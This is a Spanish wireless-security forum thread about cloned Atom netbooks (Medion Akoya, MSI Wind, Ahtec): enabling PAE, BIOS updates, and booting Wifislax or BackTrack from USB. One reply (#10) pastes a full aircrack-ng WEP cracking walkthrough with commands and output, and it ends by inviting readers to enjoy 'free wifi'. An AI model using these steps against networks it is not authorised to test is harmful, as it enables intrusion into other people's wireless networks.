Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
24-09-2017, 03:36 (Domingo)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Liberada wifislax64-1.1 version final para descargar

Videos Downloader




+  Seguridad Wireless - Wifi
|-+  Equipos y materiales
| |-+  Portátiles
| | |-+  Medion mini AKOYA, AHTEC, & MSI WIND el mismo Netbook AUDITORÍA WIFISLAX
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Medion mini AKOYA, AHTEC, & MSI WIND el mismo Netbook AUDITORÍA WIFISLAX  (Leído 36472 veces)
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« : 25-07-2008, 13:47 (Viernes) »

El huevo es MSI WIND, las gallinas son los demás... y hay más de tres clones...

Medion mini AKOYA con Ralink RT2860 802.11n


El Medion Akoya E1210 será la respuesta de este fabricante alemán al Asus Eee 900, al HP 2133 Mini-Note y al MSI Wind.
una pantalla de 10 pulgadas y un procesador Atom de Intel 1´6 MHZ, 1 GIGA DE RAM un HD de 80 gigas y un precio en tienda de 399 euros, salida VGA, y una cámara de 1.3 megapíxeles.

No acaba de salir el mini-AKoya en ESPAÑA y ya se anuncia la VERSION 2
Nuevo Medion Akoya White: El lujo al alcance de la mano

un potente procesador Intel© Merom (1,83 GHz) y una memoria RAM DDRII de 2048 Mb, disco duro interno hasta 160 GB, tarjeta gráfica Intel® Graphics Media Accelerator X3100, pantalla TFT de 12,1" -El equipo se completa con una regrabadora de DVD-  a un precio de 599 euros, IVA incluido

;****************************************************************************************
;
; RT2860.inf
;
;   This installation script supports Windows 98,Me,2000 & XP for the
;   Ralink RT2860 series Wireless LAN Card.
;
;   Copyright (c)2002-2007, Ralink Technology Corp., All Rights Reserved
;   All Rights Reserved.
;   Developed by RaLink Technology, Corp. -- http://www.ralinktech.com
;
;****************************************************************************************


Pues lo acabo de encender y me abro un nuevo hilo que ire ampliando
« Última modificación: 25-07-2008, 19:19 (Viernes) por Elena_FranciX » En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #1 : 25-07-2008, 14:30 (Viernes) »

Extensión de memoria fisica (PAE) y aumento de RAM

Acabo de ver con Everest, que el min-AKOYA soporta PAE

Y el XP también soporta PAE

Por defecto se vende con 1 giga de RAM. 1024

Citar
Después de actualizarse a Microsoft Windows XP Service Pack 2 (SP2), la cantidad de memoria de la que informa el cuadro de diálogo Propiedades del sistema o la herramienta Información del sistema (Msinfo32.exe) ha cambiado. Este problema se produce cuando se cumplen las condiciones siguientes:
•   El equipo basado en Windows XP tiene 4 gigabytes (GB) de RAM o más.
•   El equipo basado en Windows XP está utilizando el modo Extensión de dirección física (PAE).
Nota: para habilitar el modo PAE debe agregar el parámetro /pae al archivo Boot.ini en la carpeta raíz de la unidad del sistema.

Por ejemplo, antes de actualizarse a Windows XP SP2, el cuadro de diálogo Propiedades del sistema puede indicar aproximadamente 3,87 GB de RAM. La herramienta Información del sistema puede indicar que la memoria física total es de aproximadamente 3.540 megabytes (MB). Después de actualizarse a Windows XP SP2, el cuadro de diálogo Propiedades del sistema puede indicar aproximadamente 3,12 GB de RAM y la herramienta Información del sistema puede indicar que la memoria física total es 2.770 MB aproximadamente.

Nota: si deshabilita el modo PAE en un equipo con Windows XP que tiene 4 GB de RAM, el cuadro de diálogo Propiedades del sistema puede indicar aproximadamente 3,12 GB de RAM y la herramienta Información del sistema puede indicar que la memoria física total es 2.710 MB aproximadamente. Se informa de estos mismos valores después de la actualización a Windows XP SP2.

Antes de empezar, más información;

Citar
Más información
Problemas de compatibilidad de controladores inducidos por el modo PAE
Los problemas de compatibilidad de controladores con Prevención de ejecución de datos (DEP) suelen estar inducidos por el modo PAE.

Nota: PAE sólo es necesario en aquellos equipos cuyos procesadores admiten DEP forzada por hardware.

Por sí sola, DEP puede crear problemas de compatibilidad con controladores que realizan generación de código o que utilizan otras técnicas para generar código ejecutable en tiempo real. Muchos controladores que presentan este comportamiento se habrían corregido porque DEP siempre está activada para los controladores que se cargan en las versiones de 64 bits de Windows. Por tanto, no hay ninguna garantía de que todos los controladores se hayan actualizado. Sin embargo, existen unos pocos controladores que utilizan estas técnicas y no se espera que DEP por sí sola provoque muchos problemas de compatibilidad de controladores.

El principal problema de compatibilidad de controladores es la ejecución en modo PAE en los equipos de 32 bits. El modo PAE permite a los procesadores direccionar más de 4 GB de memoria. La principal diferencia entre los métodos de paginación de memoria PAE y no PAE es el nivel adicional de paginación que se necesita en el modo PAE. En el modo PAE se necesitan 3 niveles de paginación en lugar de 2.

Algunos controladores no se cargan si PAE está habilitado, ya que el dispositivo no puede realizar el direccionamiento de 64 bits o porque los controladores pueden suponer que el modo PAE requiere más de 4 GB de RAM. Esos controladores creen que siempre recibirán direcciones de 64 bits cuando se está en el modo PAE y ellos o su dispositivo son incapaces de interpretar la dirección.

Otros dispositivos pueden cargarse en el modo PAE, pero provocan inestabilidad en el sistema al modificar directamente entradas de la tabla de páginas del sistema (PTE). Estos controladores esperan unas PTE de 32 bits, pero reciben unas PTE de 64 bits en su lugar en el modo PAE.

El mayor problema de compatibilidad de controladores con PAE está relacionado con las transferencias del acceso directo a memoria (DMA) y la asignación de registros. Muchos dispositivos compatibles con DMA, normalmente adaptadores de 32 bits, no pueden realizar el direccionamiento físico de 64 bits. Cuando estos dispositivos funcionan en modo de 32 bits, pueden direccionar todo el espacio de direcciones físicas. En el modo PAE, los datos pueden estar en una dirección física mayor de 4 GB. Para que los dispositivos que tienen estas restricciones puedan funcionar en esta situación, la familia Windows 2000 Server y las versiones posteriores de Windows ofrecen doble almacenamiento en búfer para la transacción DMA. Para ello, proporcionan una dirección de 32 bits indicada por un registro de asignación. El dispositivo puede realizar la transacción DMA en la dirección de 32 bits y el núcleo copia la memoria a la dirección de 64 bits proporcionada al controlador. Cuando el sistema funciona con PAE deshabilitado, los controladores de los dispositivos de 32 bits nunca requieren que la memoria real respalde sus registros de asignación. Esto significa que el doble almacenamiento en búfer no es necesario, ya que todos los dispositivos y controladores están contenidos dentro del espacio de direcciones de 32 bits. Según las pruebas realizadas de los controladores para dispositivos de 32 bits en equipos con procesadores de 64 bits, cabe esperar que la mayoría de los controladores con capacidades DMA probados en los clientes esperen registros de asignación ilimitados.

Para obtener información adicional acerca de los cambios en la funcionalidad de Windows XP SP2, visite el siguiente sitio Web de Microsoft:
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2mempr.mspx
En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #2 : 25-07-2008, 14:43 (Viernes) »

Windows de 64 Bits tienen el parametro PAE por defecto.

Mini-AKOYA de MEDION es un Intel ATOM de 32 bit.

Windows VISTA es un comedor de recursos, y por ello las versiones más CARAS de VISTA soportan mucha RAM

XP lleva más tiempo en el mercado con el SP3 es un sistema más estable, y que precisa de menos recursos

La RAM es una memoría volatil, la que ejecuta los programas en uso, que actualmente esta TIRADA de precio

La cantidad de RAM en un PC, en un Laptop en un Desktop, en un Network aún más importante gracias a sus limitados recursos, influye en el rendimiento maquina

Respuesta al por qué Windows no te reconoce los 4 GB de RAM la tiene Armonth de sigt.net:

 
Citar
   Los sistemas operativos de 32 bits sólo mapean 4GB de memoria RAM pero dado que en esos 4GB deben ser “compartidos” con otros dispositivos mapeados como puede ser la tarjeta gráfica en la práctica se dispone de 3.1GB o incluso menos si hay que mapear muchos dispositivos. Existen otras limitaciones, por ejemplo las aplicaciones en espacio de usuario sólo pueden utilizar 2GB.

    Mientras tanto en GNU/Linux pese a la limitación de los SS.OO de 32 bits se puede mapear hasta 64GB (opción desactivada por defecto) añadiendo un pequeño “overhead” aunque la ganancia de RAM sale más a cuenta que el overhead producido. En Kernel Trap hay una extensa explicación en inglés de cómo gestiona el kernel Linux (2.6) la memoria.

Pero sí es posible utilizar más de 4 GB de RAM con Windows pero en su versión de 64 bits o usando la extensión PAE (Phisical Address Extension) que se refiere a una característica de los procesadores x86 que permite a los sistemas de 32-bit utilizar hasta 64 Gibibyte (gibibyte es la contracción de giga binario byte) de memoria física, pero el uso de PAE tiene sus desventajas ya que puede ocasionar desde incompatibilidad con drivers hasta que el sistema operativo deje de arrancar.
En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #3 : 25-07-2008, 14:46 (Viernes) »

Modificamos el boot.ini para activar PAE en sistema de 32 bit que lo soporte tanto el microprocesador, como el SO

editar desde las propiedades del Sistema
Inicio>>Ejecutar>>sysdm.cpl
en la pestaña de Opciones Avanzadas Boton de Configuración Boton Editar.
Otra manera es mediante el comando bootcfg de Windows Xp

Citar
Tiene varias Secciones encerradas entre corchetes

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)/WINDOWS

Esta sección es la encargada de indicarnos cuanto tiempo espera el arranque de Windows para arrancar nuestro sistema, mediante el parámetro timeout=30. Si no tenemos mas de 1 sistema operativo instalado en nuestra maquina Windows no preguntara y arrancara del sistema indicado en la linea default.

default indica al sistema mediante rutas de acceso ARC (Advanced Risk Computing)en que disco y/o partición se encuentra el Windows a arrancar.

La linea default=multi(0)disk(0)rdisk(0)partition(1)/WINDOWS indica que Windows se encuentra en el disco 0 (disk(0)) en la primera particion (partition(1)) en el directorio Windows. Normalmente multi() indica discos IDE y scsi() discos Scsi.

Todos los parámetros de ubicación ARC están en el articulo 102873 de Microsoft.

[operating systems]
multi(0)disk(0)rdisk(0)partition(1)/WINDOWS=’Microsoft Windows XP Professional’ /fastdetect /NoExecute=OptIn

Esta seccion es la encargada de ubicar los Windows a arrancar con sus consiguientes parametros de inicio. Si el fichero tiene mas de una linea de sistema operativo el sistema espera (el valor establecido de timeout) nuestra eleccion de sistema a arrancar. Podemos tener tantas lineas como necesitemos, apuntando al mismo sistema operativo con diferentes parametros de inicio o a diferentes sistemas operativos de nuestro equipo. Por ejemplo

[operating systems]
multi(0)disk(0)rdisk(0)partition(1)/WINDOWS=’Microsoft Windows XP Professional’ /fastdetect /NoExecute=OptIn
multi(0)disk(0)rdisk(0)partition(1)/WINDOWS=’Microsoft Windows XP Professional Sin Parametros’

Con esta configuración en el Boot.ini nos pregunta si arrancamos nuestro con la configuración por defecto ‘Microsoft Windows XP Professional’ o el segundo sin parametros ‘Microsoft Windows XP Professional Sin Parametros’ Que quede claro que los 2 Windows son el mismo. El texto entre comillas es el nombre ‘amigable’ que se nos mostrara y podemos poner lo que mejor nos indique que Windows vamos a arrancar.

A continuación del nombre amigable vienen los parámetros con que Windows arrancara. Los más destacables/usuales:

/fastdetect. Deshabilita la comprobación de puertos series y paralelos para comunicaciones.

/3GB y /USERVA=3030. Permite que Exchange pueda usar más de los 2 Gb habituales asignados por Windows a los procesos. 823440

/PAE. Nos permite usar más de los 4 Gb a los que normalmente Windows tiene limitada la memoria. 283037 Si nuestro equipo tiene más de 4 Gb de memoria Ram y Windows no nos muestra el total de memoria conectada, tenemos que poner este parametro en el boot.ini para que nos reconozca el total de Ram. Los Windows de 64 Bits tienen este parametro por defecto.

http://www.teayudo.es/2007/07/fichero-bootini/
« Última modificación: 25-07-2008, 14:48 (Viernes) por Elena_FranciX » En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #4 : 25-07-2008, 14:54 (Viernes) »

Un apunte, el mini-AKOYA se vende con XP HOME + SP3 ¡Ojo! Servi Pack 3

Usar los 4Gb de Ram en el AKOYA
Debe modificarse el archivo boot.ini y agregándole el modificador /PAE.

Debería quedar así (tal cual con los espacios donde estan):

Citar
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect /PAE

En Windows XP podemos editarlo desde las propiedades del Sistema
Inicio>>Ejecutar> sysdm.cpl
En la pestaña de
Opciones Avanzadas/Inicio y recuperación/Botón de Configuración/Botón Editar.

Agregar /PAE luego de fastdetect (con espacio entre este y /PAE. Así: /fastdetect/PAE)

Por las dudas guardar el archivo boot.ini antes de modificarlo en un diskette.-


Aclaraciòn: el comando /NoExecute=OptIn, que activa la prevención de ejecución de datos (DEP), solo aparece en los Windows XP que tengan instalado Service Pack 2


Lo bueno es que puedes arrancar con uno (normal) o extendido (4G de PAE) por si hay problemas mencionados

Lo positivo, que puedes sacar más rendimiento al AKOYA, los 4 gigas y si instalas, un LINUX (Tienes un HD de 74 gigas) sabes que puedes activar esa RAM extra...

Lo mejor es que en eBay la RAM es barata...

En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #5 : 25-07-2008, 15:08 (Viernes) »

PROBLEMAS;

El AKOYA, no es fácil de abrir, y según dicen, solo tiene un SLOT de RAM

Por confirmar;
Citar
creo que el giga que lleva medion (al igual que todos los clonicos de MSI) va soldado en placa y tiene una ranura para meter el otro giga
¿...?

RE; Según los usuarios del Medion Akoya Mini que ya le han ampliado la memoria, no lleva memoria en placa, si no una ranura con 1 GB que debes quitar y poner el módulo de 2 GB.

El MSI Wind sí que lleva el MB soldado en placa y a parte la memoria.

El Ahtec hasta que alguien no lo compre y lo habra no se sabrá qué lleva realmente.

Según se dice, AKOYA y AHTEC son clonicos de MSI WIND, por lo que (falta confirmar) usan la misma BIOS

nota a favor de AHTEC; Cuenta con 2 Gb de memoria ¡al mismo precio! merece más la pena comprar el Athec (mas el bluetooth, la tecla de underclock...) dicen que metiendo la BIOS de AHTEC en AKOYA, se puede Underclokear

Se baja de vueltas el reloj para que consuma menos batería...

Las malas lenguas dicen de AHTEC;
Citar
En ahtec me dijeron que la ram iba soldada en placa, de momento me lo creo, pero como bien dices habrá que esperar a que alguien lo abra.

¿...? rumores, rumores, rumores...
« Última modificación: 25-07-2008, 15:11 (Viernes) por Elena_FranciX » En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #6 : 25-07-2008, 16:37 (Viernes) »

Netbook de distintos nombres, mismo corazón


Conviene actualizar a la última BIOS;
BIOS-Actualización E1210 Netbook
22.07.2008      -     Ver: 1.06
http://www.medion.es/

Tiene GUASA que entre los DRIVER´s para actualizar del MEDION AKOYA, se encuentre en del BLUETOOHT

Controlador Bluetooth E 1210 Netbook
(optional)
Win Vista x64/Win Vista x86
18.06.2008      -     Ver: 6.0.1.6300

Controlador Bluetooth E 1210 Netbook
Win XP
18.06.2008      -     Ver: 5.0.3200

Cuando el AKOYA no dispone de Bluetooth

AHTEC ¡si dispone de Bluetooth! pero el WI-FI es 802.11 b/g, mientras que AKOYA cambia a 802.11n

TUTORIAL de actualizar el BIOS sin sustos;

Es muy sencillo, sólo hay que seguir estos pasos:

1. Descargais la BIOS: http://www1.medion.de/downloads/download.pl?id=6524&type=treiber&filename=bioe1210.exe&lang=de

2. Haced doble clic en el archivo que habéis bajado y pulsad Aceptar.

3. Pulsad Extract. No cambiéis la ubicación en la que se descomprimirá el archivo. ES IMPORTANTE.

4. Reiniciad el ordenador y cuando aparezca el logo de Intel pulsad F3. Cargará un menú de recuperación en el que debeis elegir D. MS-DOS.

5. Enchufad el ordenador a la corriente eléctrica. Teclead CD 105 y pulsad Enter. Luego teclead FLASH y pulsar Enter otra vez.

6. Apagad el ordenador, desenchufad la corriente y la batería y esperar 30 segundos. Quitad la batería y volverla a poner. Encended el ordenador de nuevo.

7. Cuando aparezca el logo de Intel pulsad DEL para entrar en la BIOS. Pulsad F9 para cargar los ajustes por defecto y después F10 para guardar los cambios y salir.

Con eso ya tendréis la última BIOS 1.06 instalada en vuestro Akoya Mini.

Por lo visto resuelve problemas del WiFi y alguna otra cosilla más. Al mío por ejemplo, a veces al arrancarlo en la pantalla del logo de Intel se me apagaba sólo y tenía que volverlo a encender. Después de la nueva Bios no me ha vuelto a pasar.

descargar desde la PAGE del fabricante (por si hay actualizaciones)

En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #7 : 25-07-2008, 18:34 (Viernes) »


Mini-portátil de Ahtec pantalla 10'2", por 400€
1.6Ghz Intel® Atom N270 Diamondville (533Mhz/512Kb)
1024MB DDR2 533Mhz (1x1GB)
80GB 5400rpm de disco duro
Pantalla 10.2" TFT WXGA
Wireless & Webcam integrados
Pesa 1'2kg, pone que tiene Bluetooth tambien..

Se le puede ampliar la RAM a 2gb por 19€, y meter hasta 320gb de disco duro. Además se puede comprar en la web del farbicante y el precio es con el envio incluido.

PROBLEMAS:

- No tiene unidad de CD-DVD.
- Viene con Linux Novell, instalar Xp cuesta 80€.

Novell = SuSe
En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #8 : 25-07-2008, 18:48 (Viernes) »


“Wind” Corre como el Viento

Dispongase a disfrutar de una vida movil que es tan facil como una brisa. El Portátil MSI Wind, que estará disponible pronto en el mercado, integra un diseño ligero, atractivo y varias funciones exclusivas que ofrecen a los usuarios la libertad de utilizarlo "como quiera, donde quiera, cuando quiera." El portátil MSI Wind tiene un diseño sencillo y practico, convirtiéndose en el compañero ideal para los usuarios en movimiento.
La optimización del portátil MSI Wind lo sitúa delante de otros portátiles de bajo coste, y otros fabricantes de ordenadores trabajan para copiar las prestaciones optimizadas ofrecidas en exclusivas en el portátil de MSI Wind. Otros Portátiles ligeros y económicos del mercado tienen un diseño muy pobre. Son atractivos pero poco prácticos ya que, una vez que pasa la novedad, resultan ser muy poco funcionales. La función Flash, por ejemplo, es muy restringida en su uso y prestaciones, de modo que al final, los usuarios lamentan conseguirlo y dejan de utilizarlo. En el contraste, todo en el portátil de MSI Wind, desde la dimensión de la pantalla a funciones de software, ha sido escogido y diseñado desde la perspectiva del usuario.
El primer modelo de Portátil de MSI Wind será el U100

Libertad para Ver
- 10" Amplia Pantalla LCD
MSI ha escogido una amplia pantalla LCD de 10" para el portátil Wind - U100 como contraposición a los tamaños más pequeños habituales en estos portátiles ligeros, para proporcionar mejor comodidad viendo o leyendo. Además, la resolución 1024x600 permite utilizar la pantalla completa para visitar páginas Web, dándole la libertad explorando Internet.
- Lo último en tecnología de retroiluminación LED con ahorro de energía
El Portátil de MSI Wind - U100 integra la tecnología de retroiluminación LED con ahorro de energía para ofrecer mejor brillo y colores, elevando la calidad de imagen total. Además, el menor uso de energía permite ofrecer un tiempo de utilización de la batería más elevado.
- Conveniente con Capacidad de Ampliación
El Portatil de MSI Wind - U100 esta equipado con la capacidad de ampliar el texto dentro del software, de manera que puede ampliar cualquiera de las palabras mostradas en el monitor libremente, haciéndolo mas fácil cuando ve fotos, corrigiendo o leyendo documentos.

Libertad para Ir
- Ligereza en Diseño
Con un tamaño de aproximadamente 26 centímetros de longitud, 18 centímetros de ancho y 19-31.5 mm de grosor, lo que lo hace extremadamente delgado. El peso total incluyendo la batería es no mas de 1 kilogramo, haciendo del portátil de MSI Wind - U100 un portátil ideal para llevar a cualquier lugar.

Libertad para Funcionar
- Teclado ergonómico de tamaño grande y touch pad
MSI continúa en su empeño por ofrecer lo mejor con el Wind, incluyendo el diseño ergonómico de teclado de sus portátiles más pequeños. El teclado del portátil MSI Wind - U100 no solo tiene una gran textura, sino que también cuenta con un mayor espacio entre las teclas (17.5 mm), permitiéndole la mayor comodidad posible. Además, la barra espaciadora y el touchpad están ingeniosamente diseñados para que sus dedos puedan moverse suavemente.
- Disco duro con Gran Capacidad
A diferencia de sus competidores que ha comprometido la capacidad de memoria para disminuir en el tamaño, el Wind U100 está equipado con el disco duro estándar de 2.5 pulgadas de 80GB, lo que le permite trabajar como cualquier otro ordenador portátil; sin las preocupaciones de no tener suficiente capacidad de memoria para registrar los mejores momentos de la vida.
- Intel Atom, el más Nuevo procesador de Intel
El Procesador Intel Atom utiliza un nuevo diseño de estructura como base añadiendo 47 millones de transistores a un chip, y su tamaño no llega a 25 (mm) ². Este es hasta el momento el procesador más pequeño de Intel y el que menor energía consume (el uso de energía está limitado de 1 a 2.5 vatios). Además, este procesador ofrece gran movilidad y funciones excelentes para que los usuarios tengan acceso completo a internet.

Libertad para Jugar
- El Entusiasmo de la comunicación instantánea
Equipado con cámara web de alta resolución, altavoces estéreo de 2 canales de alto rendimiento, y micrófono, perfectamente integrados, expresando la precisión de la tecnología y la elegancia de lo moderno. Las videoconferencias pueden ser transmitidas al instante sin perder un momento emocionante. Las fotos son tomadas con resoluciones precisas y colores brillantes, capturando la imagen exacta y añadiendo más diversión a los mensajes instantáneos.
- Conexión a Internet Inalámbrica
El Portátil MSI Wind - U100 tiene conexión inalámbrica 802.11b/g y Bluetooth, que permite disfrutar del acceso a Internet en cualquier lugar, evitando dificultades en su vida diaria.
- Completo Interfaz de ampliación Multimedia
El portátil de MSI Wind - U100 ofrece un interfaz de entretenimiento completo, que incluye Lector de Tarjetas 4 en 1 (SD. MMC, MS y MS Pro), cumpliendo con los estándares de las principales tarjetas de memoria, haciéndolo fácil para cargar archivos digitales en el ordenador portátil. Enfocada en los productos comunes en el mercado, como PDA’s, cámaras digitales, cámaras de video digitales, reproductores MP3, Sistemas GPS gracias a la incorporación de puertos USB 2.0. Puede añadirse una grabadora DVD externa (opcional) para jugar y poder grabar los archivos que desee.
- Larga duración de la Batería
La duración de la batería puede aumentar la movilidad y productividad del portátil MSI Wind –U100, facilitando también tu vida.
En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #9 : 25-07-2008, 19:18 (Viernes) »

Auditoria desde Netbook con WIFISLAX

1 pendrive USB, 1, Ó 2 Gigas en FAT32 (3 O 4 EUROS)
1 IMAGEN de WIFISLAX;
wifislax-small-3.1 (Solo 290 megas)
Descarga: http://download.wifislax.com/wifislax-small-3.1.iso
1 NETBOOK MSI WIND, AKOYA, o AHTEC o similar....

Citar
solo hay que añadir esos 2 archivos dentro de la carpeta /boot dentro del pendrive y substituirlos por lo que lleva, ademas renombrar la carpeta wifislax  por mylinux

Los 2 archivos;
http://telefonica.net/web2/wifislax/modulos-extra/ws31usb.zip

pasos a seguir
Cita de: indio99
(o al menos los que he seguido) para un usb de 1 o 2 Gb

Tener el usb formateado con un sistema de archivos FAT (yo lo tengo en FAT32) olvidaros de NTFS

Copiar el contenido del CD al usb tal cual, con copiar y pegar, si montas la imagen del cd para leerla desde el disco duro, para no grabarla en cd, pues eso, con daemontools en win y en linux ya sabreis no?

Una vez copiados todos los archivos, abres el usb (NOOO, con un martillo y un destornillador no vecerro Grin Grin Grin) y te diriges a la carpeta boot, allí ejecuta el archivo bootinst.bat (desde windows) o bootinst.sh en una terminal linux. eso hará que el usb ya sea un bootusb

por último, sobrescribir los archivos que se encuentran en éste archivo comprimido facilitado por el BOSS Hwagm en colaboración de monyol

« Última modificación: 25-07-2008, 19:20 (Viernes) por Elena_FranciX » En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #10 : 25-07-2008, 23:23 (Viernes) »

Depende que Netbook tengas, tendras drives pachados o no en una u otra distribución, si antes veiamos WIFISLAX en versión MINI, ahora B|T3


http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar


Despues metemos el contenido de ese rar en la memoria, quedando los directorios boot/ y BT3/ en la raiz.

Ahora vamos a Inicio -> Ejecutar -> cmd
y ponemos la letra de la unidad de almacenamiento donde estan los archivos, en mi caso H:

después entramos en la carpeta boot (cd boot/ ) y despues en la carpeta dos (cd dos/)

Acto seguido, ejecutamos el .bat ( BT3.bat )

Nos dira que la letra H: podria perder la info y bla bla bla, y cuando finalice, ya tendremos una sd con un pedazo de linux de la ost....

Acordaros que para que arranque desde la SD o pendrive hay que cambiar la configuración en la BIOS.

Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive y nuestro pequeño Asus Eee utilizando Windows xp.

Yo lo he probado con mi Eee 900 y funciona perfectamente, conseguí el password “que había olvidado” de mi casa en menos de 20 minutos.

Requisitos previos:

Necesitaremos el Backtrack 3 versión USB: Descargar desde aquí.
http://www.remote-exploit.org/backtrack_download.html

Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

En windows vamos al menu de inicio > ejecutar > cmd

Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

Bien, ahora empieza lo divertido…

Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.

Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.

Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.

Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

PASO 1:

NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

En una terminal pones:

airmon-ng start wifi0

a continuación:

airodump-ng ath1

cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1

donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.

PASO 2:

Abre una nueva terminal, ya sabes como…

aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

Si te sale esto felicidades:

Código:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Si no, intenta con lo siguiente:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

Y te debería salir algo como esto:

Código:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Si no, olvidate.

Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…

PASO 3:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

Espera hata tener unos 40.000 más o menos y abre una tercera terminal.

PASO 4:

Quiero mi clave yaaaarl!!!

aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.

Gracias a http://www.georgehafiz.co.uk/aircrackeeepc.php

En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #11 : 23-08-2008, 14:56 (S?bado) »

A ver, si ponemos un poco de orden al desconcierto de los NETBOOK

Akoya de medion solo dispone de un Slot, o sea la RAM solo se puede ampliar con un modulo de 2 gigas, y el PAE es más jodido de llevar a cabo

Akoya mete un WI-FI 802.11n que no vale para nada, ni auditoria y esta mas sordo que mi abuela del pueblo

Akoya, no mete Bluetooth

AHTEC si mete 802.11 b/g No se cual, y si tiene 2 slot de RAM lo cual es buena cosa como MSI WIND

399 Es el precio más bajo para estos 3, sube si va con XP en algunos modelos


ACER ONE lleva el mismo cerebro, un INTEL ATOM 1.6 pero lleva 512 ram EN PLACA y un SLOT que solo admite 1 giga, o sea maximo 1´5 gigas de RAM si se mete la DDR2 667 MHz (la de AKoya, MSI, AHTEC, eeepc...) te cepillas el ACER ONE, o sea,s e ROMPE al loro con esto

Acer One, tiene sus driver´s para XP en su pagina WEB oficial, esto es buena cosa, ACER ONE sale con un SSD de 8 gigas y/o con un SATA de 80 gigas como los anteriores, el SSD es una castaña, de escritura en XP, y la gente lo modifica por una CF un churro que suma gastos a los 299 euros...

o LOS 349 EUROS del ACER ONE de SATA, en Mediakk, saldra el nuevo AKOYA con 160 gigas de SATA al mismo precio (es un secreto) a finales de agosto, pero medion solo tiene un SLOT, de RAM no tiene Bluetooth, y el PAE olvidate


Yo uso PAE en un ASUS 3 gigas de RAM en XP y va de lujo, corre que se las pela, es un 1.6 dual core y rinde más que otro ASUS de 2 mhz Dual core con 2 gigas de RAM el tamaño si importa...

Cuidadin con los duros a pesetas, los mini NetBook no son PC completos, los nuevos Intel Atom son una virgeria, nada que ver con los celeron de los primeros eeepc 701... aun asi, no es oro todo lo que reluce, y a que precios
En línea
moisty70
**
Desconectado Desconectado

Mensajes: 8


Ver Perfil
« Respuesta #12 : 23-09-2008, 23:26 (Martes) »

Hola, he probado a "trabajar" con el Akoya mini y la wifislax desde USB y bien, con una tarjeta USB claro.
Eso si, el problema que veo es que no me funciona el touchpad, algo que tambien le pasa a otros foreros de forosmsiwind.es. ¿Hay solucion?

Y ya de paso ¿La tajeta del netbook se puede poner en monitor?
En línea
